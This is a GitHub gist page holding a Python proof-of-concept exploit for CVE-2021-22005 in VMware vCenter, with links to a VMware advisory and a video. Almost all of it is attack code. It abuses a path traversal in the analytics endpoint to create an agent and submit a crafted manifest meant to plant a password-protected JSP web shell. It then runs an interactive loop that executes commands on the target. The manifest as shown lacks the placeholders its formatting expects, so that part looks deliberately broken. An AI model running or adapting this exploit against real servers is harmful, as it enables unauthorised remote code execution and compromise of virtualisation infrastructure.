-
-
Save testanull/c2f6fd061c496ea90ddee151d6738d2e to your computer and use it in GitHub Desktop.
CVE-2021-22005_PoC.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def id_generator(size=6, chars=string.ascii_lowercase + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
def escape(_str): | |
_str = _str.replace("&", "&") | |
_str = _str.replace("<", "<") | |
_str = _str.replace(">", ">") | |
_str = _str.replace("\"", """) | |
return _str | |
def run_shell(url, pwd, cmd): | |
burp0_url = url | |
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} | |
burp0_data = {pwd: cmd.strip()} | |
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content | |
ct = ct.split('<pre>')[1].split('</pre>')[0] | |
return ct | |
def createAgent(url, agent_name): | |
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" } | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False) | |
pwd = id_generator(6) | |
agent_name = id_generator(6) | |
shell_name = id_generator(6)+".jsp" | |
manifestData = """<manifest recommendedPageSize="500"> | |
<request> | |
<query name="vir:VCenter"> | |
<constraint> | |
<targetType>ServiceInstance</targetType> | |
</constraint> | |
<propertySpec> | |
<propertyNames>content.about.instanceUuid</propertyNames> | |
<propertyNames>content.about.osType</propertyNames> | |
<propertyNames>content.about.build</propertyNames> | |
<propertyNames>content.about.version</propertyNames> | |
</propertySpec> | |
</query> | |
</request> | |
<cdfMapping> | |
<indepedentResultsMapping> | |
<resultSetMappings> | |
<entry> | |
<key>vir:VCenter</key> | |
<value> | |
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> | |
<resourceItemToJsonLdMapping> | |
<forType>ServiceInstance</forType> | |
<mappingCode><![CDATA[ | |
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())## | |
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")## | |
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))## | |
$obj.addProperty("OSTYPE", "VMware can't steal this PoC")## | |
$obj.addProperty("BUILD", $content-about-build)## | |
$obj.addProperty("VERSION", $content-about-version)##]]> | |
</mappingCode> | |
</resourceItemToJsonLdMapping> | |
</value> | |
</value> | |
</entry> | |
</resultSetMappings> | |
</indepedentResultsMapping> | |
</cdfMapping> | |
<requestSchedules> | |
<schedule interval="1h"> | |
<queries> | |
<query>vir:VCenter</query> | |
</queries> | |
</schedule> | |
</requestSchedules> | |
</manifest>""" % (shell_name, pwd, pwd) | |
target = sys.argv[1] | |
print "Target: "+ target | |
print "Creating Agent (of SHIELD) ..." | |
createAgent(target, agent_name) | |
print "Collecting Agent (of SHIELD) ..." | |
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"}) | |
print "Success!" | |
print "Shell: " + target+"/idm/..;/"+shell_name | |
print "Pwd: "+ pwd | |
print "Launching pseudo shell ..." | |
while True: | |
cmd = raw_input("/remote_shell/# ").strip() | |
if(cmd =="quit"): | |
sys.exit(-1) | |
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd) | |
time.sleep(1) | |
print(output) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
https://kb.vmware.com/s/article/85717
https://youtu.be/mMpDzL_fplM